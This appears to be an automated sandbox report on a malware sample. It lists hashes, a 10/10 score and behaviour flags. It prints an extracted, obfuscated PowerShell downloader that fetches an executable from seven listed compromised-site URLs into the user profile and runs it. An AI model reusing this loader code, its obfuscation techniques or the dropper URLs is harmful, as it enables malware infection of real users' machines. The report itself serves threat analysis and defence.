General

  • Target

    16ea5d66df1706dee374737e0af072ba_JaffaCakes118

  • Size

    172KB

  • Sample

    240505-kveqlsch6x

  • MD5

    16ea5d66df1706dee374737e0af072ba

  • SHA1

    8bb0e715e57ead75d33265a28329b4adb693dd7f

  • SHA256

    a162bffd2c7937b14cbc56696db2b2a7a964b9998e204c32edaa94c4de1cddc1

  • SHA512

    a5af0e7d61d37f672223e9dcccc2abd536dd67256f5ba624846ce89439ab21d00c9980c816a68ba1894f5b57fa56370776116d3ca87bde52e200097ab31ac938

  • SSDEEP

    1536:erdi1Ir77zOH98Wj2gpngR+a9LpxO8nq78ct2PU7MXKSSxH5pcKaJn57y2t:erfrzOH98ipgekB57V

Score
10/10

Malware Config

Extracted

Language
ps1
Source
$Uhxq4lu=(('Cs'+'din')+'k'+'0');&('n'+'e'+'w-item') $enV:USeRpROfILE\uofWsUv\lnxYN6_\ -itemtype DireCToRY;[Net.ServicePointManager]::"S`E`C`UrITypr`oTOcOl" = ('t'+'l'+('s12,'+' t'+'l')+('s'+'1'+'1, tls'));$Fzgau0e = ('M'+'jl'+('zif'+'mu'));$C4i9x5n=(('Rh'+'m')+'m'+('zq'+'s'));$D89iwvk=$env:userprofile+((('bC'+'RUofw')+'su'+'vb'+('CRLn'+'xy')+'n6'+'_b'+'C'+'R') -cREplaCe('bC'+'R'),[chaR]92)+$Fzgau0e+(('.e'+'x')+'e');$Staqmrf=('A'+('ge'+'t')+('kk'+'y'));$Wub3m1t=&('n'+'ew'+'-object') Net.wEBCLienT;$Anzl9uk=(('ht'+'t')+('p:'+'//')+('rh'+'y')+'t'+'o'+'n-'+('bu'+'ild')+('in'+'g')+'.c'+('om/'+'wp-a')+('dmin/'+'Ey8qV'+'0/*')+('htt'+'p:')+('//'+'ez')+('zl'+'l')+('.'+'com/w'+'p')+('-in'+'c')+'lu'+('de'+'s/KIU2WU'+'/')+'*h'+'t'+('t'+'p://t'+'el')+('l'+'me')+('t'+'ec')+('h.'+'c')+('om'+'/wp-co'+'nt'+'en')+('t'+'/4k')+'a'+('/'+'*http')+('s'+'://elm')+('undo'+'del'+'ar')+('epost'+'e')+'r'+'i'+'a'+'.'+('com'+'/wp'+'-')+('a'+'dm')+'i'+('n/0'+'PV')+('VmJm/*'+'h'+'t')+('tp'+'s://ma')+('n'+'ue')+'l'+('roza'+'s.cl/')+'a'+('sse'+'t'+'s'+'/XWN/*h'+'tt')+'p'+'s'+(':/'+'/')+'h'+('ar'+'itdha')+('rni.c'+'om'+'/')+('wp-a'+'d')+('min/b'+'ZM/'+'*ht')+('tp'+'s://t')+'he'+('w'+'orks-grou'+'p'+'.'+'com'+'/s')+('it'+'e/pQ')+('T'+'6j')+'5/')."SP`Lit"([char]42);$Ce1slsq=('Tu'+'zc'+('x'+'l4'));foreach($Pvsedn3 in $Anzl9uk){try{$Wub3m1t."dOWn`loA`D`FIlE"($Pvsedn3, $D89iwvk);$V7txmd_=('Q'+('59q1'+'6o'));If ((.('Get'+'-Ite'+'m') $D89iwvk)."L`enGTh" -ge 28279) {.('Invo'+'ke'+'-Item')($D89iwvk);$Lju1_sh=('I'+('14'+'4')+('d'+'4z'));break;$Hzp3au_=(('C7'+'su')+('a0'+'7'))}}catch{}}$Gsgcie6=(('Hv'+'_o')+'g5'+'t')
URLs

exe.dropper  http://rhyton-building.com/wp-admin/Ey8qV0/
exe.dropper  http://ezzll.com/wp-includes/KIU2WU/
exe.dropper  http://tellmetech.com/wp-content/4ka/
exe.dropper  https://elmundodelareposteria.com/wp-admin/0PVVmJm/
exe.dropper  https://manuelrozas.cl/assets/XWN/
exe.dropper  https://haritdharni.com/wp-admin/bZM/
exe.dropper  https://theworks-group.com/site/pQT6j5/

Targets

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Blocklisted process makes network request

    • Drops file in System32 directory

MITRE ATT&CK Enterprise v15
